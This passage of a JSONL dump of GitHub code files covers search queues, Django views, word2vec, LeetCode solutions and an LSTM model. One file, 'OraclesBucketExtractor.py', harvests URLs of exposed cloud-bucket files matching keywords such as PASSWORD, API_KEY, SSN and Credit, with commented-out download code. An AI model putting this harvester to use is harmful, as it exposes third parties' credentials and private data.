ostream.write(\"\\t{} :: {}\\n\".format(x, self[x]))\n\n def pprint_start(self, n=10, ostream=stdout):\n \"\"\"Print the first n elements in the queue.\"\"\"\n n = min(n, len(self))\n ostream.write(\"Showing first {} elements in the queue\\n\".format(n))\n self.pprint(0, n, ostream)\n\n def pprint_end(self, n=10, ostream=stdout):\n \"\"\"Print the last n elements in the queue.\"\"\"\n n = min(n, len(self.queue))\n ostream.write(\"Showing last {} elements in the queue\\n\".format(n))\n self.pprint(len(self)-n, n, ostream)\n\n def pprint_edges(self, n=5, ostream=stdout):\n \"\"\"Print the first and last n elements in the queue.\"\"\"\n if len(self) <= 2 * n:\n ostream.write(\"Showing all elements\\n\")\n self.pprint(0, len(self), ostream)\n else:\n self.pprint_start(n, ostream)\n self.pprint_end(n, ostream)\n\n\nclass DFS_NodeQueue(NodeQueue):\n put = NodeQueue.append\n get = NodeQueue.pop\n\n\nclass BFS_NodeQueue(NodeQueue):\n put = NodeQueue.append\n get = NodeQueue.popleft\n\n\nNodeQueue.DFS = DFS_NodeQueue\nNodeQueue.BFS = BFS_NodeQueue\n\n\nclass CheckQueue(Plugin):\n \"\"\"\n This solver plugin is automatically included in queue-based tree search solvers. It check,\n at the end of each iteration, if the node queue is empty. When the queue becomes empty, the\n solver is interrupted and the search finishes.\n \"\"\"\n EMPTY_QUEUE = \"node queue is empty\"\n\n signal_map = {Solver.SIGNALS.ITERATION_FINISHED: \"check\"}\n emits = {EMPTY_QUEUE}\n\n def check(self, listener):\n if len(self.solver.queue) == 0:\n self.solver.channel.emit(self.EMPTY_QUEUE)\n self.solver.interrupts.add(\"node queue is empty\", Solver.ACTION.FINISH)\n","repo_name":"2xR/legacy","sub_path":"opt/treesearch/_queuebased/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28983543784","text":"from django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom control_inventario import models\nimport json\n\nfrom django.contrib.auth.decorators import login_required\n\n\ndef update_compra_list(emp):\n compra_list = emp.compra_set.values().order_by(\"fecha\")\n for compra in compra_list:\n compra['tipo_comprobante'] = models.TipoComprobante.objects.get(id=compra[\"tipo_comprobante_id\"]).denominacion\n compra['proveedor'] = models.Proveedor.objects.get(id=compra[\"proveedor_id\"]).nombre\n return compra_list\n\n\n@login_required(login_url='/ingresar')\ndef resumen_compra(request):\n id_empresa = request.session['empresa'][\"id\"]\n mes = request.session[\"mes\"]\n emp = models.Empresa.objects.get(id=id_empresa)\n\n comprobante_list = models.TipoComprobante.objects.values()\n cliente_list = emp.cliente_set.values()\n compra_list = update_compra_list(emp)\n tipo_operacion_list = models.TipoOperacion.objects.values()\n\n args = {}\n args[\"comprobante_list\"] = comprobante_list\n args[\"cliente_list\"] = cliente_list\n args[\"compra_list\"] = compra_list\n args[\"tipo_operacion_list\"] = tipo_operacion_list\n return render_to_response('resumen_compras/main.html', args, context_instance=RequestContext(request))\n\ndef detalle_compra(request):\n datos = request.POST\n d_list = []\n if datos:\n id_compra = datos.get(\"id_compra\")\n detalles_list = models.DetalleCompra.objects.filter(compra_id=id_compra).values()\n for i in detalles_list:\n i[\"valor_unitario\"] = float(i['valor_unitario'])\n i[\"importe\"] = float(i['importe'])\n i[\"igv\"] = float(i['igv'])\n i[\"valor_venta\"] = float(i['valor_venta'])\n prod = models.Producto.objects.get(id=i['producto_id'])\n i['codigo'] = prod.codigo\n d_list.append(i)\n\n args = {}\n args['d_list'] = d_list\n args['success'] = True\n json_data = json.dumps(args)\n return HttpResponse(json_data, mimetype=\"application/json\")\n","repo_name":"jink8904/mysite","sub_path":"control_inventario/app/resumen_compras/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39287007678","text":"# coding=utf-8\n# These are all the modules we'll be using later. Make sure you can import them\n# before proceeding further.\nfrom __future__ import print_function\nimport collections\nimport math\nimport numpy as np\nimport os\nimport random\nimport tensorflow as tf\nimport zipfile\nfrom matplotlib import pylab\nfrom six.moves import range\nfrom six.moves.urllib.request import urlretrieve\nfrom sklearn.manifold import TSNE\n\n\ndef read_data(filename):\n \"\"\"Extract the first file enclosed in a zip file as a list of words\"\"\"\n with zipfile.ZipFile(filename) as f:\n data = tf.compat.as_str(f.read(f.namelist()[0])).split()\n return data\n\nwords = read_data(\"text8.zip\")\nprint('Data size %d' % len(words))\n\nvocabulary_size = 50000\n\n\ndef build_dataset(words):\n \"\"\"\n 从词库中抽取出出现次数最多的vocabulary_size个词,并将这vocabulary_size个词进行编号,编号后按照此编号对词库中的所有的词建立索引,\n 词库中没有的词索引为0。\n :param words: 词库\n :return:\n \"\"\"\n count = [['UNK', -1]]\n # 词库中的字数统计,并且取其中出现次数最多的vocabulary_size个词。\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n dictionary = dict()\n # 创建词索引,为vocabulary_size个词按照出现次数从大到小编号,存为字典格式。创建词汇表\n for word, _ in count:\n dictionary[word] = len(dictionary)\n # 用于存放词的索引\n data = list()\n unk_count = 0\n # 对词库中的每个词按照dictionary中的索引进行编号, 如果没有出现的词则都标为0。即低频词汇使用UNK替换。\n for word in words:\n if word in dictionary:\n index = dictionary[word]\n else:\n # 不在词典中的词定义为UNK\n index = 0 # dictionary['UNK']\n unk_count += 1\n data.append(index)\n\n count[0][1] = unk_count\n # 转换成[编号,词]对, 逆词汇表\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n return data, count, dictionary, reverse_dictionary\n\ndata, count, dictionary, reverse_dictionary = build_dataset(words)\nprint('Most common words (+UNK)', count[:5])\nprint('Sample data', data[:10])\nprint('Sample reverse_dictionary', [reverse_dictionary[i] for i in data[:10]])\ndel words # Hint to reduce memory.\n\ndata_index = 0\n\n\ndef generate_batch(batch_size, num_skips, skip_window):\n \"\"\"\n batch_size是指一次扫描多少块,skip_window为左右上下文取词的长短,num_skips输入数字的重用次数。\n :param batch_size:\n :param num_skips:\n :param skip_window:\n :return:\n \"\"\"\n global data_index\n assert batch_size % num_skips == 0\n assert num_skips <= 2 * skip_window\n # 用来存放每个bantch的数据\n batch = np.ndarray(shape=(batch_size), dtype=np.int32)\n labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)\n span = 2 * skip_window + 1 # [ skip_window target skip_window ]\n # 新建一个双向链表,长度为span\n buffer = collections.deque(maxlen=span)\n for _ in range(span):\n buffer.append(data[data_index])\n data_index = (data_index + 1) % len(data)\n\n print('data_index', data_index)\n print('buffer_init:')\n for i in buffer:\n print(reverse_dictionary[i],)\n\n for i in range(batch_size // num_skips):\n target = skip_window # target label at the center of the buffer\n targets_to_avoid = [skip_window]\n print('target_int, target_to_avoid_init', target, targets_to_avoid)\n for j in range(num_skips):\n while target in targets_to_avoid:\n target = random.randint(0, span - 1)\n print('target_runing', target)\n targets_to_avoid.append(target)\n print('targets_to_avoid_runing', targets_to_avoid)\n batch[i * num_skips + j] = buffer[skip_window]\n labels[i * num_skips + j, 0] = buffer[target]\n buffer.append(data[data_index])\n print('buffer______runing')\n for k in buffer:\n print(reverse_dictionary[k],)\n data_index = (data_index + 1) % len(data)\n print('data_index', data_index)\n return batch, labels\n\nprint('data:', [reverse_dictionary[di] for di in data[:16]])\n\nfor num_skips, skip_window in [(2, 1), (4, 2)]:\n batch, labels = generate_batch(batch_size=8, num_skips=num_skips, skip_window=skip_window)\n print('\\nwith num_skips = %d and skip_window = %d:' % (num_skips, skip_window))\n print(' batch:', [reverse_dictionary[bi] for bi in batch])\n print(' labels:', [reverse_dictionary[li] for li in labels.reshape(8)])\n\n# for _ in range(3):\n# batch_size = 8\n# num_skips = 2\n# skip_window = 1\n# batch_data, batch_labels = generate_batch(batch_size, num_skips, skip_window)\n# print('\\nwith num_skips = %d and skip_window = %d:' % (num_skips, skip_window))\n# print(' batch:', [reverse_dictionary[bi] for bi in batch_data])\n# print(' labels:', [reverse_dictionary[li] for li in batch_labels.reshape(batch_size)])\n\nbatch_size = 128\nembedding_size = 128 # Dimension of the embedding vector.\nskip_window = 1 # How many words to consider left and right.\nnum_skips = 2 # How many times to reuse an input to generate a label.\n# We pick a random validation set to sample nearest neighbors. here we limit the\n# validation samples to the words that have a low numeric ID, which by\n# construction are also the most frequent.\nvalid_size = 16 # Random set of words to evaluate similarity on.\nvalid_window = 100 # Only pick dev samples in the head of the distribution.\nvalid_examples = np.array(random.sample(range(valid_window), valid_size))\nnum_sampled = 64 # Number of negative examples to sample.\n\ngraph = tf.Graph()\n\nwith graph.as_default(), tf.device('/cpu:0'):\n # Input data.\n train_dataset = tf.placeholder(tf.int32, shape=[batch_size])\n train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])\n valid_dataset = tf.constant(valid_examples, dtype=tf.int32)\n\n # Variables.\n embeddings = tf.Variable(\n tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))\n softmax_weights = tf.Variable(\n tf.truncated_normal([vocabulary_size, embedding_size],\n stddev=1.0 / math.sqrt(embedding_size)))\n softmax_biases = tf.Variable(tf.zeros([vocabulary_size]))\n\n # Model.\n # Look up embeddings for inputs.\n embed = tf.nn.embedding_lookup(embeddings, train_dataset)\n # Compute the softmax loss, using a sample of the negative labels each time.\n loss = tf.reduce_mean(\n tf.nn.sampled_softmax_loss(weights=softmax_weights, biases=softmax_biases, inputs=embed,\n labels=train_labels, num_sampled=num_sampled, num_classes=vocabulary_size))\n\n # Optimizer.\n # Note: The optimizer will optimize the softmax_weights AND the embeddings.\n # This is because the embeddings are defined as a variable quantity and the\n # optimizer's `minimize` method will by default modify all variable quantities\n # that contribute to the tensor it is passed.\n # See docs on `tf.train.Optimizer.minimize()` for more details.\n optimizer = tf.train.AdagradOptimizer(1.0).minimize(loss)\n\n # Compute the similarity between minibatch examples and all embeddings.\n # We use the cosine distance:\n norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))\n normalized_embeddings = embeddings / norm\n valid_embeddings = tf.nn.embedding_lookup(\n normalized_embeddings, valid_dataset)\n similarity = tf.matmul(valid_embeddings, tf.transpose(normalized_embeddings))\n\n#\n# num_steps = 100001\n#\n# with tf.Session(graph=graph) as session:\n# tf.global_variables_initializer().run()\n# print('Initialized')\n# average_loss = 0\n# for step in range(num_steps):\n# batch_data, batch_labels = generate_batch(\n# batch_size, num_skips, skip_window)\n# feed_dict = {train_dataset : batch_data, train_labels : batch_labels}\n# _, l = session.run([optimizer, loss], feed_dict=feed_dict)\n# average_loss += l\n# if step % 2000 == 0:\n# if step > 0:\n# average_loss = average_loss / 2000\n# # The average loss is an estimate of the loss over the last 2000 batches.\n# print('Average loss at step %d: %f' % (step, average_loss))\n# average_loss = 0\n# # note that this is expensive (~20% slowdown if computed every 500 steps)\n# if step % 10000 == 0:\n# sim = similarity.eval()\n# for i in range(valid_size):\n# valid_word = reverse_dictionary[valid_examples[i]]\n# top_k = 8 # number of nearest neighbors\n# nearest = (-sim[i, :]).argsort()[1:top_k+1]\n# log = 'Nearest to %s:' % valid_word\n# for k in range(top_k):\n# close_word = reverse_dictionary[nearest[k]]\n# log = '%s %s,' % (log, close_word)\n# print(log)\n# final_embeddings = normalized_embeddings.eval()","repo_name":"STHSF/DeepLearning","sub_path":"word2vec/word2vec_skip_gram.py","file_name":"word2vec_skip_gram.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"36226834089","text":"def fetch_input():\n data = []\n with open('input.txt', 'r') as file:\n data = file.read()\n return data.split(\"\\n\")\n\ndef parse_input_to_map(input):\n result = {}\n for line in input:\n fields = line.split(\"contain \")\n key_values = fields[0].split(\" \")\n key = key_values[0] + \" \" + key_values[1]\n value = []\n if not \"no other bags\" in fields[1]:\n bags = fields[1].split(\", \")\n for bag in bags:\n words = bag.split(\" \")\n count = int(words[0])\n color = words[1] + \" \" + words[2]\n value.append({\"count\": count, \"color\": color})\n result[key] = value\n return result\n\ndef can_contain(data, curr_key, to_find):\n if curr_key == to_find:\n return True\n if (len(data[curr_key]) == 0):\n return False\n result = False\n for bag in data[curr_key]:\n result |= can_contain(data, bag[\"color\"], to_find)\n return result\n \n\ndef search_for_color(data, to_find):\n print(data)\n count = 0\n for key in data.keys():\n if key != to_find and can_contain(data, key, to_find):\n count += 1\n print(count)\n\ndef main():\n input = fetch_input()\n data = parse_input_to_map(input)\n results = search_for_color(data, \"shiny gold\")\n\nmain()\n","repo_name":"chrisfisch914/AdventOfCode2020","sub_path":"Day7/day7-1.py","file_name":"day7-1.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32224856531","text":"# Definition for a binary tree node.\nfrom typing import Optional\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n \nclass Solution:\n def getMinimumDifference(self, root: Optional[TreeNode]) -> int:\n def traverse(curNode):\n if curNode is None:\n return []\n else:\n return traverse(curNode.left) + [ curNode.val] + traverse(curNode.right)\n nums = traverse(root)\n nums.sort() \n ans = nums[1] - nums[0]\n for i in range(2, len(nums)):\n ans = min(ans, nums[i] - nums[i-1])\n return ans\n \n \n ","repo_name":"chrisbyd/leetcode_chris","sub_path":"sorting/530.py","file_name":"530.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39397849258","text":"class Solution:\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n row, col, maxarea = len(grid), len(grid[0]), 0\n checked = set()\n\n def area(x, y):\n if (not(0 <= x < row and 0 <= y < col)) or (x, y) in checked or (grid[x][y] == 0):\n return 0\n checked.add((x, y))\n return 1 + area(x, y-1) + area(x-1, y) + area(x, y+1) + area(x+1, y)\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n maxarea = max(area(i, j), maxarea)\n\n return maxarea\n","repo_name":"Otabek8866/my-leetcode-solutions","sub_path":"Algrithms-Level-1/day-7/s2.py","file_name":"s2.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10760076972","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM,GRU,SimpleRNN\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nfrom keras.optimizers import RMSprop, SGD , Adagrad , Adam\nfrom keras.layers import Input, Flatten, Dropout, Activation,BatchNormalization\nfrom keras.models import load_model\nfrom impyute.imputation.cs import mice\nimport sys\nfrom impyute.imputation.cs import fast_knn\nsys.setrecursionlimit(1000000) #Increase the recursion limit of the OS\n\n\nMISS_LEN = 0.2\n\ndef corrupt_data_set(dataset):\n data_corrupted = np.copy(dataset)\n for i in range(np.shape(dataset)[1]):\n column = np.copy(dataset[:,i])\n missing_pct = int(column.size * MISS_LEN)\n j = [random.choice(range(column.shape[0])) for _ in range(missing_pct)]\n column[j] = np.NaN\n data_corrupted[:,i] = column\n return data_corrupted\n \ndef create_dataset(dataset, look_back=11):\n data_x, data_y = [], []\n data_corrupted = np.array([])\n data_corrupted = np.float64(corrupt_data_set(dataset))\n imputed_training = mice(data_corrupted) \n for i in range(15000):\n data_x.append(imputed_training[i:i+look_back,:])\n data_y.append(imputed_training[i+look_back,0])\n data_x = np.array(data_x)\n data_y = np.array(data_y)\n return data_x[0:12000,:],data_x[12000:15000,:],data_y[0:12000],data_y[12000:15000]\n\n\n\ndata = np.load('polution_dataSet.npy')\nscaler = MinMaxScaler(feature_range=(0, 1))\ndata = scaler.fit_transform(data)\nx_train,x_test,y_train,y_test = create_dataset(data,11)\n\n\nmodel = Sequential()\nmodel.add(LSTM(16,input_shape=(11, 8)))\nmodel.add(Dense(16))\nmodel.add(Dense(1))\nmodel.compile(loss='mean_absolute_error', optimizer=\"RMSprop\")\nhist = model.fit(x_train, y_train, epochs=65, batch_size=128, validation_split = 0.2, verbose=1)\nplt.plot(hist.history['loss'])\nplt.plot(hist.history['val_loss'])\nplt.title('Daily Model loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Val'], loc='upper right')\nplt.show()\n\n\n\nfig_Accuracy = plt.figure(figsize=(25, 6))\ny_pred=model.predict(x_test)\nreal_daily_stat = []\npredicted_daily_stat = []\nfor i in range(len(y_pred)):\n if(i%12==0):\n real_daily_stat.append(y_test[i])\n predicted_daily_stat.append(y_pred[i])\nplt.plot(real_daily_stat, label= 'real pollution')\nplt.plot(predicted_daily_stat, label = 'pollution prediction')\nplt.title('Daily pollution prediction vs real pollution')\nplt.legend()\nplt.show()","repo_name":"ARokni/Neural-Network-","sub_path":"Project 2/Codes/Part2_Simulation_with_Imputed_Data.py","file_name":"Part2_Simulation_with_Imputed_Data.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30060748963","text":"import requests\r\n\r\nprint(\"\"\"\r\n.___________. __ __ _______ ______ .______ ___ ______ __ _______ \r\n| || | | | | ____| / __ \\ | _ \\ / \\ / || | | ____|\r\n`---| |----`| |__| | | |__ | | | | | |_) | / ^ \\ | ,----'| | | |__ \r\n | | | __ | | __| | | | | | / / /_\\ \\ | | | | | __| \r\n | | | | | | | |____ | `--' | | |\\ \\----./ _____ \\ | `----.| `----.| |____ \r\n |__| |__| |__| |_______| \\______/ | _| `._____/__/ \\__\\ \\______||_______||_______|\r\n\"\"\")\r\nprint(\"Oracle's Bucket Extractor\")\r\nprint(\"Exfiltrate the planet. :)\")\r\nprint(\"file_paths.txt contains all the file paths, enjoy the data!\")\r\n\r\n#keywords = [\"JWT_SECRET\", \"MONGO_PASSWORD\", \"PASSWORD\", \"DB_\", \"PRIVATE\", \"KEY\", \"API_KEY\", \"api-key\", \"Card UID\", \"Total Sales\", \"SSN\", \"Credit\"]\r\n#urlextensions = txt,xls,csv,db,sql,yaml,env,tftstate,cs,php\r\n#extensions = [\"xls\", \"db\", \"sql\", \"yaml\", \"env\", \"tfstate\"]\r\n\r\nkeywords = [\"db_\", \"config\"]\r\nurlextensions = \"php\"\r\nexcludekeywords = \"-test\" #Make sure you have a minus, if you don't want anything, just do !\r\nextensions = [\"xls\"]\r\naccess_token = \"\" #Input your access token.\r\ndoKeyword = False\r\ndoExtension = True\r\npaths = []\r\n# Set up the API endpoint and parameters\r\n\r\nif doKeyword:\r\n for keyword in keywords:\r\n endpoint = f\"https://buckets.grayhatwarfare.com/api/v1/files/{keyword}{excludekeywords}/0/1000?extensions={urlextensions}&access_token={access_token}\"\r\n response = requests.get(endpoint)\r\n data = response.json()\r\n num_results = data[\"results\"]\r\n print(f\"[+] Extracting \" + str(num_results) + f\" Of Entries for [{keyword}].\")\r\n num_pages = num_results // 1000\r\n\r\n for i in range(1, num_pages + 1):\r\n endpoint = f\"https://buckets.grayhatwarfare.com/api/v1/files/{keyword}{excludekeywords}/{i*1000}/1000?extensions={urlextensions}&access_token={access_token}\"\r\n response = requests.get(endpoint, verify=True)\r\n #print(response.request.url)\r\n data = response.json()\r\n #print(data)\r\n for file in data[\"files\"]:\r\n domain_name = file[\"url\"]\r\n full_path = file[\"fullPath\"]\r\n #file_data = requests.get(f\"{domain_name}{full_path}\")\r\n #open(f\"{full_path.split('/')[-1]}\", \"wb\").write(file_data.content)\r\n paths.append((domain_name, full_path))\r\n # Write the domain_name and full_path to a .txt file\r\n with open(\"file_paths.txt\", \"a\") as f:\r\n for path in paths:\r\n f.write(f\"{path[0]}{path[1]}\\n\")\r\n # Clear the list to avoid buffer issues\r\n paths = []\r\n\r\nif doExtension:\r\n for extension in extensions:\r\n print(\"[+] Extracting Extensions now.\")\r\n endpoint = f\"https://buckets.grayhatwarfare.com/api/v1/files/{excludekeywords}/0/1000?extensions={extension}&access_token={access_token}\"\r\n response = requests.get(endpoint, verify=True)\r\n #print(response.request.url)\r\n data = response.json()\r\n num_results = data[\"results\"]\r\n print(f\"[+] Extracting \" + str(num_results) + f\" Of Entries for [{extension}].\")\r\n num_pages = num_results // 1000\r\n\r\n for i in range(1, num_pages + 1):\r\n endpoint = f\"https://buckets.grayhatwarfare.com/api/v1/files/{excludekeywords}/{i*1000}/1000?extensions={extension}&access_token={access_token}\"\r\n response = requests.get(endpoint, verify=True)\r\n data = response.json()\r\n for file in data[\"files\"]:\r\n domain_name = file[\"url\"]\r\n full_path = file[\"fullPath\"]\r\n paths.append((domain_name, full_path))\r\n with open(\"ext_paths.txt\", \"a\") as f:\r\n for path in paths:\r\n f.write(f\"{path[0]}{path[1]}\\n\")\r\n # Clear the list to avoid buffer issues\r\n paths = []\r\n","repo_name":"Oracle-Security/PublicBucketExtractor","sub_path":"OraclesBucketExtractor.py","file_name":"OraclesBucketExtractor.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"26089770835","text":"class Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n n1 = len(word1)\n n2 = len(word2)\n pt1 = 0\n pt2 = 0\n ans = ''\n while pt1 < n1 and pt2 < n2:\n ans += word1[pt1]\n ans += word2[pt2]\n pt1 += 1\n pt2 += 1\n while pt1 < n1:\n ans += word1[pt1]\n pt1 += 1\n while pt2 < n2:\n ans += word2[pt2]\n pt2 += 1\n return ans","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"1768-merge-strings-alternately/1768-merge-strings-alternately.py","file_name":"1768-merge-strings-alternately.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6671465278","text":"import colorama\nfrom colorama import Fore, Back, Style\nimport sys\n\nDEBUG = 1 #set to 1 to enable debug mode, set to 0 to turn off debug mode\n\nERROR = \"[ \" + Fore.RED + \"ERROR\" + Fore.WHITE + \" ] : \"\nSUCCESS = \"[ \" + Fore.GREEN + \"SUCCESS\" + Fore.WHITE + \" ] : \"\nRUNNING = \"[ \" + Fore.GREEN + \"RUNNING\" + Fore.WHITE + \" ] : \"\nWARNING = \"[ \" + Fore.YELLOW + \"WARNING\" + Fore.WHITE + \" ] : \"\n\ndef versioning():\n if('2.7.' not in sys.version):\n print(ERROR + 'Python version 2.7.xx required')\n return False\n\n if('0.3.' not in colorama.__version__):\n print(WARNING + 'install/upgrade colorama for aesthetic appeal')\n\n print(SUCCESS + 'crypto-backtest loaded')\n return True\n\nif(not versioning()):\n quit()\n\ncolorama.init()\n","repo_name":"patrickgrad/crypto-backtest","sub_path":"cb_statuses.py","file_name":"cb_statuses.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74011731075","text":"\nimport calendar\nimport datetime\nimport logging\nimport math\nimport pytz\nimport sys\nimport time\n\nlogger = logging.getLogger(__name__)\n\n##############################################################################################################\n\nclass tzoffset(datetime.tzinfo):\n\n def __init__(self, offset=0):\n self._offset = datetime.timedelta(seconds=offset)\n \n def utcoffset(self, dt):\n return self._offset\n\n def dst(self, dt):\n #return self._dstoffset\n return datetime.timedelta(0)\n\n def tzname(self, dt):\n return self._name\n\n##############################################################################################################\n\ndef getText(doc, tag):\n nodes = doc.getElementsByTagName(tag)\n if len(nodes) < 1:\n return \"\"\n if nodes[0].firstChild == None:\n return \"\"\n if nodes[0].firstChild.data == None:\n return \"\"\n return nodes[0].firstChild.data\n\ndef strToNaiveDateTime(dateTime):\n if dateTime == \"\":\n return None\n # 2009-06-04T17:44:02Z\n return datetime.datetime.strptime(dateTime,\"%Y-%m-%dT%H:%M:%SZ\")\n\ndef epochToNaiveDateTime(epoch):\n if epoch is None or epoch <= 0:\n return None\n dt = datetime.datetime.utcfromtimestamp(epoch)\n #print(\"%d -> %s\" % (epoch,dt))\n return dt\n\ndef strToDateTime(dateTime):\n if dateTime == \"\":\n return None\n # 2009-06-04T17:44:02Z\n dateTime = dateTime[:len(dateTime)-1]+\" UTC\"\n return datetime.datetime.strptime(dateTime,\"%Y-%m-%dT%H:%M:%S %Z\").replace(tzinfo=tzoffset(0))\n\ndef epochToDateTime(epoch, tz=tzoffset(0)):\n if epoch is None or epoch <= 0:\n return None\n return datetime.datetime.fromtimestamp(epoch,tz)\n\ndef dateTimeToEpoch(dt):\n if dt is None:\n return None\n if dt.utcoffset():\n print(\" offset is %s\" % dt.utcoffset())\n udt = dt - dt.utcoffset()\n else:\n udt = dt\n return time.mktime(udt.timetuple())\n\ndef hms(secs):\n hours = math.trunc(secs / (60*60))\n secs = secs - hours * 60*60\n mins = math.trunc(secs / 60)\n secs = int(secs - mins * 60)\n return \"%02d:%02d:%02d\" % (hours,mins,secs)\n\n##############################################################################################################\n\nif __name__ == \"__main__\":\n\n # 1372673894 -> 2013-07-01 10:18:14\n orig_epoch = 1372673894\n orig_dt_str = \"2013-07-01T10:18:14Z\"\n\n dt = datetime.datetime.strptime(orig_dt_str,\"%Y-%m-%dT%H:%M:%SZ\")\n print(orig_dt_str)\n print(dt)\n\n print(orig_epoch)\n print(calendar.timegm(dt.timetuple()))\n\n sys.exit(0)\n\n\n\n dt_str = \"2009-06-04T17:44:02Z\"\n print(dt_str)\n dt = strToDateTime(dt_str)\n print(dt.isoformat())\n epoch = dateTimeToEpoch(dt)\n print(epoch) # wrong\n print(int(dt.strftime(\"%s\")))\n dt2 = epochToDateTime(epoch)\n print(dt2.isoformat())\n\n print(\"--------\")\n dt = datetime.datetime.strptime(dt_str[:len(dt_str)-1],\"%Y-%m-%dT%H:%M:%S\")\n print(dt.isoformat())\n epoch = int(dt.strftime(\"%s\"))\n print(epoch)\n dt2 = datetime.datetime.fromtimestamp(epoch)\n print(dt2.isoformat())\n\n print(\"--------\")\n dt = datetime.datetime.strptime(dt_str[:len(dt_str)-1],\"%Y-%m-%dT%H:%M:%S\")\n print(dt.isoformat())\n\n dt = dt.replace(tzinfo=pytz.UTC)\n print(dt.isoformat())\n\n epoch = int(dt.strftime(\"%s\"))\n print(epoch)\n\n dt2 = datetime.datetime.utcfromtimestamp(epoch)\n print(dt2.isoformat())\n","repo_name":"XSEDE/karnak_retired_source_20220729","sub_path":"karnak/python-normalized/lib/karnak/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71248176835","text":"#LC 58\ndef lola(s: str):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if s.strip() == \"\":\n return 0\n reversed = s[::-1].strip()\n for i in range(len(reversed)):\n if reversed[i] == \" \":\n return i\n return len(reversed) \n\n\n","repo_name":"Urus-Corsa/Data-Structures-Algorithms","sub_path":"Strings/lengthOfLastWord.py","file_name":"lengthOfLastWord.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10476187764","text":"# -*- coding: utf-8 -*-\nimport datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding model 'Attribute'\n db.create_table('OOExample_attribute', (\n ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('name', self.gf('django.db.models.fields.CharField')(max_length=60)),\n ))\n db.send_create_signal('OOExample', ['Attribute'])\n\n # Adding model 'Release'\n db.create_table('OOExample_release', (\n ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ))\n db.send_create_signal('OOExample', ['Release'])\n\n # Adding M2M table for field attrbutes on 'Release'\n db.create_table('OOExample_release_attrbutes', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('release', models.ForeignKey(orm['OOExample.release'], null=False)),\n ('attribute', models.ForeignKey(orm['OOExample.attribute'], null=False))\n ))\n db.create_unique('OOExample_release_attrbutes', ['release_id', 'attribute_id'])\n\n # Adding model 'Instance'\n db.create_table('OOExample_instance', (\n ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('release', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['OOExample.Release'])),\n ))\n db.send_create_signal('OOExample', ['Instance'])\n\n # Adding model 'InstanceAttribute'\n db.create_table('OOExample_instanceattribute', (\n ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('instance', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['OOExample.Instance'])),\n ('attribute', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['OOExample.Attribute'])),\n ('value', self.gf('django.db.models.fields.CharField')(max_length=60)),\n ))\n db.send_create_signal('OOExample', ['InstanceAttribute'])\n\n\n def backwards(self, orm):\n # Deleting model 'Attribute'\n db.delete_table('OOExample_attribute')\n\n # Deleting model 'Release'\n db.delete_table('OOExample_release')\n\n # Removing M2M table for field attrbutes on 'Release'\n db.delete_table('OOExample_release_attrbutes')\n\n # Deleting model 'Instance'\n db.delete_table('OOExample_instance')\n\n # Deleting model 'InstanceAttribute'\n db.delete_table('OOExample_instanceattribute')\n\n\n models = {\n 'OOExample.attribute': {\n 'Meta': {'object_name': 'Attribute'},\n 'id': ('django.db.models.fields.AutoField', [], 